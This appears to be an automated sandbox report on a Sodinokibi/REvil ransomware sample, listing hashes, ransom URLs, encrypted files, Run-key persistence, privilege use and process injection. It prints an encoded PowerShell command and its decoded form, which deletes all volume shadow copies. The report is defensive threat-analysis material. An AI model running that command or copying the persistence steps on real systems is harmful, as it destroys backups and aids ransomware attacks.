Analysis

Max time kernel: 99s
Max time network: 99s
Platform: windows10_x64
Resource: win10
Submitted: 29-06-2020 07:31

Static task: static1

Behavioral task: behavioral1
  Sample: b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe
  Resource: win7v200430

Behavioral task: behavioral2
  Sample: b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe
  Resource: win10

General

Target: b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe
Size: 212KB
MD5: c283e5ec517605b6226c29f96f6d1d28
SHA1: 43caef6a20ab9e045d76f8bf3e4e96d622f2a6eb
SHA256: b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb
SHA512: 8a72a611925f7e504ebde23dba0f23f1cb30613bc1c3f6e36dfa3c8e954e152054a154ad3cc5eaeb4861e776135daa77ce19ebc0b00813d83298fd01ca579955
Malware Config

Extracted from: C:\60k1e-readme.txt
Family: sodinokibi
URLs:
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/160F183BD6FB5CAB
- http://decryptor.cc/160F183BD6FB5CAB
Signatures

Enumerates connected drives (3 TTPs)

Drops file in Program Files directory (27 IoCs)
Process: b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe (all events below are by this process)
- File opened for modification \??\c:\program files\InitializePop.vbe
- File opened for modification \??\c:\program files\RemoveComplete.xsl
- File opened for modification \??\c:\program files\WaitGroup.jpeg
- File opened for modification \??\c:\program files\TraceConvert.mpg
- File opened for modification \??\c:\program files\PublishClear.cr2
- File created \??\c:\program files (x86)\60k1e-readme.txt
- File opened for modification \??\c:\program files\ExitMeasure.pot
- File opened for modification \??\c:\program files\ImportRepair.m1v
- File opened for modification \??\c:\program files\ResolveAdd.wmx
- File opened for modification \??\c:\program files\ConnectDisable.docx
- File opened for modification \??\c:\program files\PushTest.reg
- File opened for modification \??\c:\program files\UnlockComplete.avi
- File created \??\c:\program files\60k1e-readme.txt
- File opened for modification \??\c:\program files\ImportUninstall.ppsx
- File opened for modification \??\c:\program files\MergeEnter.htm
- File opened for modification \??\c:\program files\ReadRedo.mhtml
- File opened for modification \??\c:\program files\SuspendProtect.ttf
- File opened for modification \??\c:\program files\UnpublishRevoke.DVR-MS
- File opened for modification \??\c:\program files\GrantBlock.pptx
- File opened for modification \??\c:\program files\ImportLimit.vstm
- File opened for modification \??\c:\program files\PopDebug.rar
- File opened for modification \??\c:\program files\RestoreSkip.tiff
- File opened for modification \??\c:\program files\ResumeGet.csv
- File opened for modification \??\c:\program files\StepUse.fon
- File opened for modification \??\c:\program files\StopUpdate.xlsx
- File opened for modification \??\c:\program files\UnregisterCompress.xps
- File opened for modification \??\c:\program files\CompleteWatch.mid
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Process: b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe
- Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\eg751ha03cg72.bmp"
Adds Run entry to start application (2 TTPs, 2 IoCs)
Process: b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tQZ5HNPIrG = "C:\\Users\\Admin\\AppData\\Local\\Temp\\b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe"
Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes: b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe, powershell.exe, vssvc.exe
Token enabled / PID / process:
- SeDebugPrivilege / 2460 / b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe
- SeDebugPrivilege / 4032 / powershell.exe
- SeBackupPrivilege / 688 / vssvc.exe
- SeRestorePrivilege / 688 / vssvc.exe
- SeAuditPrivilege / 688 / vssvc.exe
- SeTakeOwnershipPrivilege / 2460 / b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe, powershell.exe
PID / process:
- 2460 / b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe
- 2460 / b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe
- 4032 / powershell.exe
- 4032 / powershell.exe
- 4032 / powershell.exe
Suspicious use of WriteProcessMemory (2 IoCs)
Process: b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe
Description / PID / process / target process:
- PID 2460 wrote to memory of 4032 / 2460 / b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe / powershell.exe
- PID 2460 wrote to memory of 4032 / 2460 / b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe / powershell.exe
Modifies service (2 TTPs, 5 IoCs)
Process: vssvc.exe
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
Processes

C:\Users\Admin\AppData\Local\Temp\b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe"
  PID: 2460
  - Drops file in Program Files directory
  - Sets desktop wallpaper using registry
  - Adds Run entry to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

  Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    (the -e argument is base64-encoded UTF-16LE PowerShell; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, i.e. deletion of all volume shadow copies, which is why vssvc.exe starts and takes SeBackupPrivilege/SeRestorePrivilege below)
    PID: 4032
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 3332

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 688
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service